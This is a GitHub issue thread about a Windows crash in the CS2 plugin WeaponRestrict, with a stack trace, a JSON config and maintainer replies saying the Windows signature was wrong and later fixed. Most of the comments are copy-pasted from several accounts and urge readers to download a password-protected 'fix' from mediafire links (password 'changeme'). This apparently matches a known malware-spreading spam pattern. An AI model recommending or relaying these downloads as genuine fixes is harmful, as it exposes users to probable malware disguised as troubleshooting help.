### ISSUE TITLE
error - windows server

### ISSUE THREAD

**Issue by mayersgamer** [CS2Plugins/WeaponRestrict#15]
-----------------------------------------------------
%%%%%% console loading %%%%%%
-----------------------------------------------------

12:35:34 [INFO] (cssharp:PluginContext) Unloading plugin WeaponRestrict
12:35:34 [INFO] (cssharp:PluginContext) Finished unloading plugin WeaponRestrict
12:35:34 [INFO] (cssharp:PluginContext) Loading plugin WeaponRestrict
12:35:34 [INFO] (plugin:WeaponRestrict) WeaponRestrict: Loaded default config for de_mirage (Limits: [weapon_awp, 2]
[weapon_g3sg1, 0]
[weapon_xm1014, 0]
[weapon_scar20, 0], Quotas: )
12:35:34 [INFO] (cssharp:PluginContext) Finished loading plugin WeaponRestrict
12:35:34 [INFO] (plugin:WeaponRestrict) WeaponRestrict: Loaded default config for de_mirage (Limits: [weapon_awp, 2]
[weapon_g3sg1, 0]
[weapon_xm1014, 0]
[weapon_scar20, 0], Quotas: )

-----------------------------------------------------
%%%%%% console Error  %%%%%%
-----------------------------------------------------

12:35:34 [EROR] (cssharp:Core) Error invoking callback
System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation.
 ---> CounterStrikeSharp.API.Core.NativeException: Invalid function pointer
   at CounterStrikeSharp.API.Core.NativeAPI.ExecuteVirtualFunction[T](IntPtr function, Object[] arguments) in /home/runner/work/
CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/API.cs:line 1090
   at WeaponRestrict.WeaponRestrictPlugin.OnWeaponCanAcquire(DynamicHook hook) in X:\Main.cs:line 357
   at InvokeStub_Func`2.Invoke(Object, Span`1)
   at System.Reflection.MethodBaseInvoker.InvokeWithOneArg(Object obj, BindingFlags invokeAttr, Binder binder, Object[] paramete
rs, CultureInfo culture)
   --- End of inner exception stack trace ---
   at System.Reflection.MethodBaseInvoker.InvokeWithOneArg(Object obj, BindingFlags invokeAttr, Binder binder, Object[] paramete
rs, CultureInfo culture)
   at System.Delegate.DynamicInvokeImpl(Object[] args)
   at CounterStrikeSharp.API.Core.FunctionReference.<CreateWrappedCallback>b__18_0(fxScriptContext* context) in /home/runner/wor
k/CounterStrikeSharp/CounterStrikeSharp/managed/CounterStrikeSharp.API/Core/FunctionReference.cs:line 100

-----------------------------------------------------
%%%%%% my config %%%%%%
-----------------------------------------------------

// This configuration was automatically generated by CounterStrikeSharp for plugin 'WeaponRestrict', at 2024/08/07 06:00:10
{
  "MessagePrefix": "{Color.Orange}[WeaponRestrict] ",
  "RestrictMessage": "{Color.LightPurple}{0}{Color.Default} is currently restricted to {Color.LightRed}{1}{Color.Default} per team.",
  "DisabledMessage": "{Color.LightPurple}{0}{Color.Default} is currently {Color.LightRed}disabled{Color.Default}.",
  "WeaponQuotas": {},
  "WeaponLimits": {
    "weapon_awp": 2,
    "weapon_g3sg1": 0,
    "weapon_xm1014": 0,
    "weapon_scar20": 0
  },
  "DoTeamCheck": true,
  "AllowPickup": false,
  "VIPFlag": "@css/vip",
  "MapConfigs": {
    "awp_lego_2": {
      "WeaponQuotas": {
        "weapon_awp": 1
      },
      "WeaponLimits": {
        "weapon_deagle": 0
},
      "awp.*": {}
    },
    "awp_snowks2023_gm_cs2": {
      "WeaponQuotas": {
        "weapon_awp": 1
      },
      "WeaponLimits": {},
      "awp.*": {}
    }
  },
  "ConfigVersion": 2
}

**Comment by mayersgamer** [comment]
linux works great

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Whaliin** [comment]
The windows signature is wrong and I currently have no way of getting the correct signature for it. The Linux one works fine however. If anyone is able to update the signature feel free to let me know.

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Whaliin** [comment]
Issue should be resolved with latest version
